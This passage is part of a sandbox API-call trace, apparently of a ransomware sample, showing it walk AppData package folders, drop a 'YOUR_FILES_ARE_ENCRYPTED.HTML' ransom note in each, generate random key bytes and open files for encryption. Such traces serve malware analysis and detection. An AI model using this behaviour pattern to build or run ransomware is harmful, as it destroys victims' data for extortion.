cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.561] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.561] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState") returned 98 [0120.561] GetProcessHeap () returned 0x600000 [0120.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.562] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState" [0120.562] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\*" [0120.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.562] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.562] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 0 [0120.562] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.562] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.562] GetProcessHeap () returned 0x600000 [0120.562] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.563] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.564] CloseHandle (hObject=0x320) returned 1 [0120.564] GetProcessHeap () returned 0x600000 [0120.564] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.564] GetProcessHeap () returned 0x600000 [0120.564] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.564] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.564] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.564] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings") returned 94 [0120.564] GetProcessHeap () returned 0x600000 [0120.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.564] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings" [0120.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\*" [0120.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.565] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.565] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10733eb1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10733eb1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.565] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.565] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 107 [0120.565] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.565] lstrlenW (lpString=".lock") returned 5 [0120.565] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.565] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.565] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.565] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat") returned 107 [0120.565] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.565] lstrlenW (lpString=".dat") returned 4 [0120.565] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.565] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.566] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.566] GetProcessHeap () returned 0x600000 [0120.566] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.568] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="B5") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="29") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="19") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="48") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="0D") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F5") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="23") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="FB") returned 2 [0120.568] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="12") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="5C") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="94") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C9") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="7C") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="AF") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="B1") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D5") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="F1") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="7B") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="52") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="28") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F7") returned 2 [0120.569] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="43") returned 2 [0120.569] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="DC") returned 2 [0120.569] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="28") returned 2 [0120.569] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E0") returned 2 [0120.569] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="CB") returned 2 [0120.569] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="DA") returned 2 [0120.569] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="04") returned 2 [0120.569] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="EB") returned 2 [0120.569] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="CB") returned 2 [0120.569] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="02") returned 2 [0120.569] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="12") returned 2 [0120.570] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.570] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.570] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.570] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0120.570] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.570] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.570] GetProcessHeap () returned 0x600000 [0120.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.571] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.572] CloseHandle (hObject=0x320) returned 1 [0120.572] GetProcessHeap () returned 0x600000 [0120.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.572] GetProcessHeap () returned 0x600000 [0120.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.572] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.572] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.572] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData") returned 99 [0120.572] GetProcessHeap () returned 0x600000 [0120.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.572] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData" [0120.572] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\*" [0120.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.572] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.572] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 0 [0120.572] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.572] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.572] GetProcessHeap () returned 0x600000 [0120.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.573] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.574] CloseHandle (hObject=0x320) returned 1 [0120.574] GetProcessHeap () returned 0x600000 [0120.574] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.574] GetProcessHeap () returned 0x600000 [0120.574] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.574] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.574] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.574] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState") returned 95 [0120.574] GetProcessHeap () returned 0x600000 [0120.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.574] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState" [0120.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\*" [0120.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.575] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.575] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 0 [0120.575] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.575] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, 